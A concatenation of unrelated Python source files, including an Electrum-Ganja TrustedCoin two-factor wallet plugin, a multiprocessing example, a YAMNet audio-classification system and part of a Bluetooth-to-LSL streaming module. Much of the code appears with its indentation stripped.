def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
    def send_request(self, method, relative_url, data=None, headers=None):
        # `headers` lets callers such as transfer_credit() add extra headers (e.g. x-signature)
        kwargs = {'headers': dict(headers) if headers else {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-ganja-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-ganja-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum-Ganja/" + version.ELECTRUM_GANJA_VERSION)
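def _example_cosigner_api_usage(short_id):
    # Illustrative usage sketch, not called anywhere in this module: the module-level
    # `server` above wraps the TrustedCoin HTTP API; `short_id` is the second value
    # returned by get_user_id(storage) further below. Calling this performs network I/O.
    tos_text = server.get_terms_of_service()
    billing_info = server.get(short_id)
    return tos_text, billing_info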
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self.auth_code = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
                # TrustedCoin won't charge if the total input value is
                # lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
self.plugin.prompt_user_for_otp(self, tx)
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.auth_code = None
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return ganja.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = ganja._CKD_pub(cK, c, s)
return ganja.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = ganja.CKD_pub(cK, c, num)
return ganja.public_key_to_p2pkh(cK)
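# Note: billing addresses are derived deterministically from the public billing xpub
# and the wallet's long user id, so the client can verify the address the server asks
# it to pay (see the assertion in request_billing_info below).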
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return ganja.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum_ganja.mnemonic import Mnemonic
from electrum_ganja.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
        # old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum-Ganja.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
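# Illustrative sketch (hypothetical names, not used by this plugin): the
# `finish_requesting` decorator defined above relies on try/finally so that the
# `requesting` flag is cleared even when the wrapped call raises. The same
# pattern in isolation:
def _reset_flag_after(func):
    def wrapper(self, *args, **kwargs):
        try:
            return func(self, *args, **kwargs)
        finally:
            self.busy = False  # always cleared, even on exceptions
    return wrapper

class _FlagExample:
    busy = False

    @_reset_flag_after
    def do_work(self):
        self.busy = True
        raise RuntimeError("simulated failure")  # busy is still reset to False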
|
1.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 8 16:33:31 2020
@author: lenovouser
"""
import multiprocessing as mp
def job(q):
# sum i + i**2 + i**3 for i in [0, 1000) and report the result via the queue
res = 0
for i in range(1000):
res += i + i**2 + i**3
q.put(res) # results are collected by the parent process from the queue
if __name__ == '__main__':
q = mp.Queue()
p1 = mp.Process(target=job, args=(q,))
p2 = mp.Process(target=job, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
res1 = q.get()
res2 = q.get()
print(res1+res2)
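# Illustrative alternative (not executed here): multiprocessing.Pool expresses the
# same fan-out/collect pattern without wiring a Queue by hand. `partial_sum` and
# `pool_version` are hypothetical helpers added for illustration only.
def partial_sum(_):
    return sum(i + i**2 + i**3 for i in range(1000))

def pool_version(workers=2):
    # Pool.map distributes the calls and gathers the return values for us
    with mp.Pool(processes=workers) as pool:
        results = pool.map(partial_sum, range(workers))
    return sum(results)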
|
tf_yamnet.py
|
from __future__ import annotations
from datetime import datetime
import logging
import threading
import time
import zipfile
from typing import Sequence
import numpy as np
import tensorflow as tf
import audiosegment as ad
from sklearn.preprocessing import minmax_scale
from .BaseSystem import BaseSystem
logger = logging.getLogger(__name__)
class BaseTfYamnetSystem(BaseSystem):
audio_sample_width: int = 2
model_path: str = None
model: tf.lite.Interpreter = None
model_sample_rate: int = 16000 # The audio sample rate required by the model.
model_labels: Sequence[str] = None
raw_audio_buffer = b""
raw_audio_utc_begin: datetime = None
running: bool = False
inference_thread: threading.Thread = None
sleep: bool = True
inference_max_fps: float = 10.0
def shutdown(self):
self.running = False
if self.inference_thread is not None:
self.inference_thread.join()
def run(self):
self.inference_thread = threading.Thread(
target=self.__class__.run_inference_thread, args=(self,)
)
self.inference_thread.start()
def _recv_audio_data(self, event_type, audio_event) -> None:
self.raw_audio_utc_begin = audio_event.begin_timestamp
audio_seg = ad.from_numpy_array(audio_event.data, framerate=audio_event.rate)
# resample the audio to rate needed by the model.
resampled_audio_seg = audio_seg.resample(
sample_rate_Hz=16000, sample_width=self.audio_sample_width, channels=1
)
if self.raw_audio_buffer is None:
self.raw_audio_buffer = resampled_audio_seg.seg.raw_data
else:
temp = self.raw_audio_buffer + resampled_audio_seg.seg.raw_data
self.raw_audio_buffer = temp[
-self.model_sample_rate * self.audio_sample_width :
] # Only keep the most recent second of audio.
class TfYamnetLiteSystem(BaseTfYamnetSystem):
"""
Reference: https://tfhub.dev/google/lite-model/yamnet/classification/tflite/1
"""
def init(self):
self.model_path = self.get_config().get("--tf-model", "model/")
logger.debug('Tensorflow model: "{}"'.format(self.model_path))
logger.debug("Loading model...")
self.model = tf.lite.Interpreter(self.model_path)
logger.debug("Loading model... DONE")
logger.debug("Loading model labels...")
labels_file = zipfile.ZipFile(self.model_path).open("yamnet_label_list.txt")
self.model_labels = [l.decode("utf-8").strip() for l in labels_file.readlines()]
logger.debug("Loading model labels... DONE")
logger.debug("Setting model stuff up...")
interpreter = self.model
self.input_details = interpreter.get_input_details()
self.waveform_input_index = self.input_details[0]["index"]
self.output_details = interpreter.get_output_details()
self.scores_output_index = self.output_details[0]["index"]
interpreter.allocate_tensors()
logger.debug("Setting model stuff up... DONE")
self.get_event_manager().add_listener("new_audio_data", self._recv_audio_data)
self.running = True
@classmethod
def run_inference_thread(cls, system: TfYamnetLiteSystem):
while system.running:
if not system.model or not system.model_labels:
logger.warning("Model not ready.")
continue
if not system.raw_audio_buffer:
time.sleep(0.01) # yield briefly instead of busy-waiting for the first audio chunk
continue
interpreter = system.model
pcm_int16 = np.frombuffer(system.raw_audio_buffer, dtype=np.int16)
num_samples = int(0.975 * system.model_sample_rate)
num_to_pad = num_samples - pcm_int16.size
if num_to_pad < 0:
num_to_pad = 0
num_to_pad += 2
waveform = np.pad(pcm_int16, (0, num_to_pad))
int16_iinfo = np.iinfo(np.int16)
waveform[-1] = int16_iinfo.max
waveform[-2] = int16_iinfo.min
waveform = waveform.astype(np.float32)
waveform = minmax_scale(waveform, feature_range=(-1, 1), copy=False)
waveform = waveform[:num_samples]
# interpreter.resize_tensor_input(
# system.waveform_input_index, [waveform.size], strict=True
# )
# interpreter.allocate_tensors()
interpreter.set_tensor(system.waveform_input_index, waveform)
start = time.time()
interpreter.invoke()
scores = interpreter.get_tensor(system.scores_output_index)
end = time.time()
top_class_index = scores.argmax()
top_results = tf.math.top_k(scores, k=10)
top_class_indices = top_results.indices[0].numpy()
top_class_probs = top_results.values[0].numpy()
# logger.debug("Detected: {}".format(system.model_labels[top_class_index]))
# logger.debug(
# "Detected (took {:.3f}s): {}".format(
# (end - start),
# ", ".join(
# [
# "{} ({:.3f})".format(
# system.model_labels[idx], scores[0][idx]
# )
# for idx in top_class_indices
# ]
# ),
# )
# )
system.get_event_manager().queue_event(
"detected_classes",
{
"begin_timestamp": system.raw_audio_utc_begin,
"classes": [
{
"label": system.model_labels[idx],
"score": scores[0][idx],
}
for idx in top_class_indices
],
},
)
logger.debug("Reaching the end of the model inference thread.")
class TfYamnetSavedmodelSystem(BaseTfYamnetSystem):
def init(self) -> None:
self.model_path = self.get_config().get("--tf-model", "model/")
logger.debug('Tensorflow model: "{}"'.format(self.model_path))
logger.debug("Loading model...")
self.model = tf.saved_model.load(self.model_path)
logger.debug("Loading model... DONE")
def class_names_from_csv(class_map_csv_text):
"""Returns list of class names corresponding to score vector."""
import csv
import io
class_map_csv = io.StringIO(class_map_csv_text)
class_names = [
display_name
for (class_index, mid, display_name) in csv.reader(class_map_csv)
]
class_names = class_names[1:] # Skip CSV header
return class_names
class_map_path = self.model.class_map_path().numpy()
self.model_labels = class_names_from_csv(
tf.io.read_file(class_map_path).numpy().decode("utf-8")
)
self.get_event_manager().add_listener("new_audio_data", self._recv_audio_data)
self.running = True
@classmethod
def run_inference_thread(cls, system: TfYamnetSavedmodelSystem):
last_time = time.time()
cumu_time_s = 0.
while system.running:
now_time = time.time()
target_time_per_frame_s = 1.0 / system.inference_max_fps
frame_time_so_far_s = now_time - last_time
cumu_time_s += frame_time_so_far_s
last_time = now_time
if cumu_time_s < target_time_per_frame_s and system.sleep:
time.sleep(target_time_per_frame_s - cumu_time_s)
continue
else:
cumu_time_s -= target_time_per_frame_s
if not system.model or not system.model_labels:
logger.warning("Model not ready.")
continue
if not system.raw_audio_buffer:
continue
pcm_int16 = np.frombuffer(system.raw_audio_buffer, dtype=np.int16)
num_samples = int(0.975 * system.model_sample_rate)
# Pad the waveform to the sample length required by the model, plus 2, so we can
# append the integer min and max to make sure scaling is relative to the
# int16 type min/max (see the illustrative helper after this method).
num_to_pad = num_samples - pcm_int16.size
if num_to_pad < 0:
num_to_pad = 0
num_to_pad += 2
waveform = np.pad(pcm_int16, (0, num_to_pad))
int16_iinfo = np.iinfo(np.int16)
waveform[-1] = int16_iinfo.max
waveform[-2] = int16_iinfo.min
waveform = waveform.astype(np.float32)
waveform = minmax_scale(waveform, feature_range=(-1, 1), copy=False)
waveform = waveform[:-2]
# Run the model, check the output.
start = time.time()
scores, embeddings, log_mel_spectrogram = system.model(waveform)
end = time.time()
scores.shape.assert_is_compatible_with([None, 521])
embeddings.shape.assert_is_compatible_with([None, 1024])
log_mel_spectrogram.shape.assert_is_compatible_with([None, 64])
scores_max = tf.reduce_max(scores, axis=0)
top_results = tf.math.top_k(scores_max, k=10)
top_class_indices = top_results.indices.numpy()
top_class_probs = top_results.values.numpy()
# logger.debug("Detected: {}".format(system.model_labels[top_class_index]))
# logger.debug(
# "Detected (took {:.3f}s): {}".format(
# (end - start),
# ", ".join(
# [
# "{} ({:.3f})".format(
# system.model_labels[idx], scores_max[idx]
# )
# for idx in top_class_indices
# ]
# ),
# )
# )
system.get_event_manager().queue_event(
"detected_classes",
{
"begin_timestamp": system.raw_audio_utc_begin,
"classes": [
{
"label": system.model_labels[idx],
"score": scores_max[idx],
}
for idx in top_class_indices
],
},
)
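# Minimal sketch of the int16 padding/scaling trick used by both inference
# threads above: two sentinel samples (int16 min and max) are appended before
# minmax_scale so the output is scaled relative to the full int16 range rather
# than to whatever happens to be in the buffer, then the sentinels are dropped.
# `_normalize_int16_waveform` is an illustrative helper and is not called here.
def _normalize_int16_waveform(pcm_int16: np.ndarray, num_samples: int) -> np.ndarray:
    num_to_pad = max(num_samples - pcm_int16.size, 0) + 2
    waveform = np.pad(pcm_int16, (0, num_to_pad))
    int16_iinfo = np.iinfo(np.int16)
    waveform[-1] = int16_iinfo.max
    waveform[-2] = int16_iinfo.min
    waveform = waveform.astype(np.float32)
    waveform = minmax_scale(waveform, feature_range=(-1, 1), copy=False)
    return waveform[:num_samples]  # sentinel samples are excluded from the result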
class TfYamnetSystem(BaseSystem):
"""
A wrapper system that determines which Yamnet system to load based on the configuration.
"""
_system: BaseSystem = None
def init(self) -> None:
model_path = self.get_config()["--tf-model"]
if model_path.endswith("tflite"):
self._system = TfYamnetLiteSystem(
app=self.get_app(), config=self.get_config()
)
else:
self._system = TfYamnetSavedmodelSystem(
app=self.get_app(), config=self.get_config()
)
return self._system.init()
def shutdown(self) -> None:
self._system.shutdown()
def recv_audio_data(self, event_type, audio_event) -> None:
# Delegate to the wrapped system's handler: this wrapper does not subclass
# BaseTfYamnetSystem, so it has no raw_audio_buffer or model_sample_rate of
# its own to resample into.
self._system._recv_audio_data(event_type, audio_event)
def run(self) -> None:
self._system.run()
|
ble2lsl.py
|
"""Interfacing between Bluetooth Low Energy and Lab Streaming Layer protocols.
Interfacing with devices over Bluetooth Low Energy (BLE) is achieved using the
`Generic Attribute Profile`_ (GATT) standard procedures for data transfer.
Reading and writing of GATT descriptors is provided by the `pygatt`_ module.
All classes streaming data through an LSL outlet should subclass
`BaseStreamer`.
Also includes dummy streamer objects, which do not acquire data over BLE but
pass local data through an LSL outlet, e.g. for testing.
TODO:
* AttrDict for attribute-like dict access from device PARAMS?
.. _Generic Attribute Profile:
https://www.bluetooth.com/specifications/gatt/generic-attributes-overview
.. _pygatt:
https://github.com/peplin/pygatt
"""
from ble2lsl import utils
import json
import re
from queue import Queue
from struct import error as StructError
import threading
import time
from warnings import warn
import numpy as np
import pygatt
from pygatt.backends.bgapi.exceptions import ExpectedResponseTimeout
import pylsl as lsl
import serial
INFO_ARGS = ['type', 'channel_count', 'nominal_srate', 'channel_format']
class BaseStreamer:
"""Base class for streaming data through an LSL outlet.
Prepares `pylsl.StreamInfo` and `pylsl.StreamOutlet` objects as well as
data buffers for handling of incoming chunks.
Subclasses must implement `start` and `stop` methods for stream control.
TODO:
* Public access to outlets and stream info?
* Push chunks, not samples (have to generate intra-chunk timestamps anyway)
"""
def __init__(self, device, subscriptions=None, time_func=time.time,
ch_names=None, **kwargs):
"""Construct a `BaseStreamer` object.
Args:
device: A device module in `ble2lsl.devices`.
time_func (function): Function for generating timestamps.
subscriptions (Iterable[str]): Types of device data to stream.
Some subset of `SUBSCRIPTION_NAMES`.
ch_names (dict[Iterable[str]]): User-defined channel names.
e.g. `{'EEG': ('Ch1', 'Ch2', 'Ch3', 'Ch4')}`.
"""
self._device = device
if subscriptions is None:
subscriptions = get_default_subscriptions(device)
self._subscriptions = tuple(subscriptions)
self._time_func = time_func
self._user_ch_names = ch_names if ch_names is not None else {}
self._stream_params = self._device.PARAMS.streams
self._chunk_idxs = stream_idxs_zeros(self._subscriptions)
self._chunks = empty_chunks(self._stream_params,
self._subscriptions)
# StreamOutlet.push_chunk doesn't like single-sample chunks...
# but want to keep using push_chunk for intra-chunk timestamps
# doing this beforehand to avoid a chunk size check for each push
chunk_size = self._stream_params.chunk_size
self._push_func = {name: (self._push_chunk_as_sample
if chunk_size[name] == 1
else self._push_chunk)
for name in self._subscriptions}
def start(self):
"""Begin streaming through the LSL outlet."""
raise NotImplementedError()
def stop(self):
"""Stop/pause streaming through the LSL outlet."""
raise NotImplementedError()
def _init_lsl_outlets(self):
"""Call in subclass after acquiring address."""
self._info = {}
self._outlets = {}
for name in self._subscriptions:
info = {arg: self._stream_params[arg][name] for arg in INFO_ARGS}
outlet_name = '{}-{}'.format(self._device_id, name)
self._info[name] = lsl.StreamInfo(outlet_name, **info,
source_id=self._device_id)
self._add_device_info(name)
chunk_size = self._stream_params.chunk_size[name]
self._outlets[name] = lsl.StreamOutlet(self._info[name],
chunk_size=chunk_size,
max_buffered=360)
